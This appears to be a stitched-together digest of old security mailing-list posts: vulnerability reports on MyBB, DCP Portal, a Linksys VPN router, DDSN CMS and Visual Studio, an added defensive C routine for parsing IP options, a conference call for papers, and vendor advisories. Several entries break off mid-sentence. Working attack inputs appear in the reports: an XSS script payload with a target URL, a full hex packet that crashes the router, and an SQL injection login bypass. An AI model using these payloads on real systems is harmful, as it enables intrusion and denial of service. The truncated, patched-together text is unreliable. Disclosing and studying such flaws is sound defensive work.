MyBB 1.0.2 SQL injection
Hey, this is a bug report for MyBB software (forum software downloadable from http://www.mybboard.com). Bug found by imei.

The bug is in the usercp.php file, line 830 (ver 1.0.2, latest ver), and allows SQL injection. The bug is the result of poor checking of the $mybb->input['threadmode'] value, which can contain a quote and can change other fields' values, and may result in full access to the admin CP (by injecting the usergroup field).

The bug has been reported to the vendor and perhaps they will patch it soon.

Bests,
imei
DCP Portal Cross-Site Scripting Vulnerability
##Night_Warrior Kurdish Hacker
##night_warrior771[at]hotmail.com
##DCP Portal Cross-Site Scripting Vulnerability
##http://www.dcp-portal.org

http://vicktimhost/calendar.php?show=full&months=1&submit=GO&day=[XSS]

http://vicktimhost/search.php
Post this code: <script>alert('night_warrior');</script>
Linksys VPN Router (BEFVP41) DoS Vulnerability
Linksys BEFVP41 (possibly others; not sure which firmware) can be instantaneously crashed by sending a specially crafted IP packet with a null length for IP option #0xE4, like this one:

00 0f 66 99 a3 45 00 10 5a cc 59 84 08 00 46 00
00 2c 04 d2 00 00 ff aa 06 2a c0 a8 01 65 43 08
c6 15 e4 00 00 00 41 42 43 44 45 46 47 48 49 4a
4b 4c 4d 4e 4f 50 52 53 54 55

I tried from within the LAN side of the router. Did not test the WAN side, but it probably still works. Requires a reboot to fix. Found it accidentally while doing a Nessus scan. (Nessus referenced BID: 7175, 14536)
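As an added example (not part of the report above), a defensive IPv4 option walker in C: it rejects the zero-length option in the quoted frame instead of stalling on it or reading past the header, and handles the other option shapes (EOL, NOP, overlong length) the same way. The frame bytes are copied from the report; the function and helper names are constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame quoted in the report above, byte for byte: 14-byte Ethernet header,
 * then an IPv4 header with IHL=6, i.e. one 4-byte option slot, then payload. */
static const uint8_t kFrame[] = {
    0x00,0x0f,0x66,0x99,0xa3,0x45, 0x00,0x10,0x5a,0xcc,0x59,0x84, 0x08,0x00,
    0x46,0x00,0x00,0x2c,0x04,0xd2,0x00,0x00,0xff,0xaa,0x06,0x2a,
    0xc0,0xa8,0x01,0x65, 0x43,0x08,0xc6,0x15,
    0xe4,0x00,0x00,0x00,                  /* option 0xE4, length byte 0 */
    0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4a,0x4b,0x4c,0x4d,0x4e,0x4f,0x50,
    0x52,0x53,0x54,0x55 };

enum { OPT_BAD_HEADER = -1, OPT_BAD_LENGTH = -2 };

/* Walk the options of an IPv4 header (buffer starts at the IP header).
 * Returns the number of options seen (>= 0) or a negative error. The length
 * byte is attacker-controlled: 0 or 1 would stall "pos += olen" forever and
 * a value past IHL would read outside the header, so both are rejected. */
int walk_ip_options(const uint8_t *ip, size_t len) {
    if (len < 20 || (ip[0] >> 4) != 4) return OPT_BAD_HEADER;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if (ihl < 20 || ihl > len) return OPT_BAD_HEADER;
    int count = 0;
    for (size_t pos = 20; pos < ihl;) {
        uint8_t type = ip[pos];
        if (type == 0) break;                        /* End of Option List */
        if (type == 1) { pos++; count++; continue; } /* No-Op, single byte */
        if (pos + 1 >= ihl) return OPT_BAD_LENGTH;   /* no room for length */
        uint8_t olen = ip[pos + 1];
        if (olen < 2 || olen > ihl - pos) return OPT_BAD_LENGTH;
        pos += olen;
        count++;
    }
    return count;
}

/* Run the walker over the report's frame, skipping the Ethernet header. */
int check_report_frame(void) {
    return walk_ip_options(kFrame + 14, sizeof(kFrame) - 14);
}

/* Wrap constructed option bytes in a minimal IPv4 header (zero-padded to a
 * 4-byte boundary, which reads as End of Option List) and walk it. */
int walk_with_options(const uint8_t *opts, size_t optlen) {
    uint8_t hdr[60] = {0};
    size_t padded = (optlen + 3) & ~(size_t)3;
    if (padded > 40) return OPT_BAD_HEADER;
    hdr[0] = (uint8_t)(0x40 | ((20 + padded) / 4));
    memcpy(hdr + 20, opts, optlen);
    return walk_ip_options(hdr, 20 + padded);
}
```

The report's frame is rejected at the first option; a Router Alert option (0x94, length 4), NOP padding, and an option whose length overruns the header are the other cases a walker has to get right.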
DIMVA 2006 Call for Papers
Sorry if you receive multiple copies of this Call for Papers.

RECENT UPDATES!!!
- Due to multiple requests the paper submission deadline has been extended to Friday, January 27, 2006!
- Selected papers will be published in revised and extended version in a special issue of Springer's Journal in Computer Virology!

---
CALL FOR PAPERS

DIMVA 2006
Third GI SIG SIDAR Conference on Detection of Intrusions, Malware, and Vulnerability Assessment
In Cooperation with IEEE Computer Society Task Force on Information Assurance

Berlin, Germany
July 13 - 14, 2006

http://www.dimva.org/dimva2006
mailto:[EMAIL PROTECTED]
---

The special interest group Security - Intrusion Detection and Response (SIDAR) of the German Informatics Society (GI) organizes DIMVA as an annual conference that brings together experts from throughout and outside of Europe to discuss the state of the art in the areas of intrusion detection, malware detection, and vulnerability assessment.

DIMVA invites three types of submissions:

- Full papers of up to 20 pages, presenting novel and mature research results. Full papers will be reviewed, and papers accepted for presentation at the conference will be included in the proceedings. The proceedings will appear in Springer's Lecture Notes in Computer Science (LNCS) series. In addition, selected papers will be published in revised and extended version in a special issue of Springer's Journal in Computer Virology.

- Industry papers of up to 10 pages, describing best practices, case studies, lessons learned, or latest product developments. Industry papers will be reviewed and, if accepted for presentation at the conference, published on the DIMVA 2006 Web site.

- Proposals of two-to-three-hour tutorials on topics of current or emerging interest. Tutorial proposals must not exceed 3 pages. They must clearly identify the intended audience, include a brief biography of the speaker, and contain sufficient material to provide a sense of their scope and depth. Tutorial material will be published on the DIMVA 2006 Web site.

The scope of DIMVA is broad and includes, but is not restricted to, the following areas:

Vulnerability Assessment:
- Vulnerabilities and exploitation techniques
- Vulnerability detection
- Avoidance of vulnerabilities and software testing
- Reverse engineering
- ROI on vulnerability assessment and management

Intrusion Detection:
- Intrusion techniques
- Intrusion detection and event correlation
- Intrusion response and intrusion prevention
- Benchmarking of intrusion detection and prevention systems
- Incident management and response

Malware:
- Malware techniques
- Malware detection
- Malware prevention
- Benchmarking of malware detection and prevention systems
- Computer and network forensics

DIMVA particularly encourages papers that discuss the technical as well as the organizational integration of vulnerability, intrusion and malware detection techniques and systems for large-scale communication and enterprise networks. Furthermore, papers from other communities such as law-making, law enforcement, economics and public administration that present these communities' perspectives on and contributions to the above IT security issues are welcomed.

ORGANIZING COMMITTEE
General Chair: Pavel Laskov, Fraunhofer FIRST, Germany, [EMAIL PROTECTED]
Program Chair: Roland Bueschkes, T-Mobile, Germany, [EMAIL PROTECTED]
Sponsor Chair: Marc Heuse, n.runs, Germany, [EMAIL PROTECTED]

PROGRAM COMMITTEE
Phil Attfield, Northwest Security Institute, USA
Thomas Biege, SUSE LINUX Products GmbH, Germany
Marc Dacier, Institut Eurecom, France
Herve Debar, France Telecom RD, France
Sven Dietrich, Carnegie Mellon University, USA
Toralv Dirro, McAfee, Germany
Ulrich Flegel, University of Dortmund, Germany
Dirk Haeger, BSI, Germany
Bernhard Haemmerli, HTA Luzern, Switzerland
Oliver Heinz, arago AG, Germany
Peter Herrmann, NTNU Trondheim, Norway
Marc Heuse, n.runs, Germany
Erland Jonsson, Chalmers University of Technology, Sweden
Klaus Julisch, IBM Research, USA
Engin Kirda, Technical University Vienna, Austria
Hartmut Koenig, BTU Cottbus, Germany
Klaus-Peter Kossakowski, DFN-Cert, Germany
Christopher Kruegel, Technical University Vienna, Austria
Jens Meggers, Symantec, USA
Michael Meier, BTU Cottbus, Germany
Achim Mueller, Deutsche Telekom Laboratories, Germany
Martin Naedele, ABB Corporate Research, Switzerland
Dirk Schadt, Computer Associates, Germany
Window Snyder, Chordata Security, USA
Robin Sommer, ICIR/ICSI,
TSLSA-2006-0002 - multi
Trustix Secure Linux Security Advisory #2006-0002

Package names: clamav, cups, fetchmail, mod_auth_pgsql, sudo
Summary: Multiple vulnerabilities
Date: 2006-01-13
Affected versions:
  Trustix Secure Linux 2.2
  Trustix Secure Linux 3.0
  Trustix Operating System - Enterprise Server 2

--
Package description:

clamav
Clam AntiVirus is a GPL anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the package, which you can use with your own software.

cups
The Common UNIX Printing System provides a portable printing layer for UNIX(R) operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces.

fetchmail
Fetchmail is a remote mail retrieval and forwarding utility intended for use over on-demand TCP/IP links, like SLIP or PPP connections. Fetchmail supports every remote-mail protocol currently in use on the Internet (POP2, POP3, RPOP, APOP, KPOP, all IMAPs, ESMTP ETRN, IPv6, and IPSEC) for retrieval. Then Fetchmail forwards the mail through SMTP so you can read it through your favorite mail client.

mod_auth_pgsql
The mod_auth_pgsql module consists of an authorization handler that uses a PostgreSQL server as the basis for authorizations.

sudo
Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines.

Problem description:

clamav < TSL 3.0 > < TSL 2.2 >
- New Upstream.
- SECURITY Fix: Fixes possible heap based buffer overflow in libclamav/upx.c.
  The Common Vulnerabilities and Exposures project has assigned the name CVE-2006-0162 to this issue.

cups < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
- SECURITY Fix: Chris Evans has reported some vulnerabilities in xpdf, which can be exploited by malicious people to cause a DoS.
  - Integer overflow error exists in Stream.cc:StreamPredictor::StreamPredictor() and Stream.cc::CCITTFaxStream::CCITTFaxStream() when calculating buffer sizes for memory allocation. This can potentially be exploited to overflow the allocated heap memory.
  - An infinite loop error exists in Stream.cc::DCTStream::readMarker() when handling certain malformed input files. This can potentially be exploited to cause a DoS.
  - Missing validation of input parameters in Stream.cc:DCTStream::readHuffmanTables() and Stream.cc:DCTStream::readScanInfo() can cause out-of-bounds memory access. This can potentially be exploited to overwrite certain memory.
  - Some potential integer overflow error exists in JBIG2Stream.cc.
  The Common Vulnerabilities and Exposures project has assigned the names CVE-2005-3624, CVE-2005-3625, CVE-2005-3626 and CVE-2005-3627 to these issues.

fetchmail < TSL 3.0 > < TSL 2.2 >
- New Upstream.
- SECURITY Fix: A vulnerability has been reported in Fetchmail caused by a null pointer dereferencing error when handling a message without email headers. This can be exploited to crash Fetchmail when the upstream mail server sends a message without headers.
  The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-4348 to this issue.

mod_auth_pgsql < TSL 3.0 >
- New Upstream.
- SECURITY Fix: iDEFENSE has reported a format string flaw in mod_auth_pgsql. This could allow a remote unauthenticated attacker to execute arbitrary code as the httpd process.
  The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-3656 to this issue.

sudo < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
- SECURITY FIX: A vulnerability has been reported in Sudo caused by an error within the environment cleaning. This can be exploited by a user with sudo access to a perl script to load and execute arbitrary library files via the PERLLIB, PERL5LIB and the PERL5OPT environment variables.
  The Common Vulnerabilities and Exposures project
TSL-2006-0001 - postgresql
Trustix Secure Linux Bugfix Advisory #2006-0001

Package names: postgresql
Summary: Various bug fixes
Date: 2006-01-13
Affected versions:
  Trustix Secure Linux 3.0
  Trustix Secure Linux 2.2

--
Package description:

postgresql
PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server.

Problem description:

postgresql < TSL 3.0 > < TSL 2.2 > < TSEL 2 >
- New Upstream

Action:
We recommend that all systems with this package installed be upgraded. Please note that if you do not need the functionality provided by this package, you may want to remove it from your system.

Location:
All Trustix Secure Linux updates are available from
URI:http://http.trustix.org/pub/trustix/updates/
URI:ftp://ftp.trustix.org/pub/trustix/updates/

About Trustix Secure Linux:
Trustix Secure Linux is a small Linux distribution for servers. With focus on security and stability, the system is painlessly kept safe and up to date from day one using swup, the automated software updater.

Automatic updates:
Users of the SWUP tool can enjoy having updates automatically installed using 'swup --upgrade'.

Questions?
Check out our mailing lists:
URI:http://www.trustix.org/support/

Verification:
This advisory along with all Trustix packages are signed with the TSL sign key. This key is available from:
URI:http://www.trustix.org/TSL-SIGN-KEY

The advisory itself is available from the errata pages at
URI:http://www.trustix.org/errata/trustix-2.2/ and
URI:http://www.trustix.org/errata/trustix-3.0/
or directly at
URI:http://www.trustix.org/errata/2006/0001/

MD5sums of the packages:

--
Trustix Security Team
DDSN CMS Admin Panel SQL Injection Vulnerability
Web Site: http://www.ddsn.com and http://www.cm3cms.com

Description: DDSN is an expert provider of professional services surrounding the science of content management: design, information architecture, deployment, and integration. In addition we offer our own content management software: our flagship product is cm3 content manager. cm3 provides powerful off-the-shelf web-based content management tools driven by a deep and extensible application development platform at a killer price. cm3 is the perfect choice for both large and small organisations looking for a CMS that will grow with their business.

SQL injection code:
Username : 'or'
Password : 'or'

Contact: [EMAIL PROTECTED] and irc.gigachat.net
Created by Botan
Visual Studio Remote Code Execution
Hi,

I coded a remote code execution exploit for Visual Studio 2005 and below. If you open a solution and you click on the Form1.cs file, the code inside the UserControl1_Load function is executed. You can code your backdoor inside this function. Basically the exploit only starts a calc.exe application.

Have a look at http://www.securiteam.com or http://www.priestmaster.org/exploits

greets,
priestmaster.
MDKSA-2006:013 - Updated kolab packages fix vulnerability
Mandriva Linux Security Advisory                         MDKSA-2006:013
http://www.mandriva.com/security/

Package : kolab-resource-handlers
Date    : January 12, 2006
Affected: 2006.0

Problem Description:

A problem exists in how the Kolab Server transports emails bigger than 8KB in size and if a dot (.) character exists in the wrong place. If these conditions are met, kolabfilter will double this dot and a modified email will be delivered, which could lead to broken clear-text signatures or broken attachments.

The updated packages have been patched to correct these problems.

References:
http://kolab.org/security/kolab-vendor-notice-07.txt

Updated Packages:

Mandriva Linux 2006.0:
0ac77fdb0776f06f40dd8ba0ed30d317  2006.0/RPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.noarch.rpm
45f74289423c41ad54d49f7e77899fa8  2006.0/SRPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
2d56dcded06922276579f29129533a1e  x86_64/2006.0/RPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.noarch.rpm
45f74289423c41ad54d49f7e77899fa8  x86_64/2006.0/SRPMS/kolab-resource-handlers-0.4.1-0.20050811.2.1.20060mdk.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com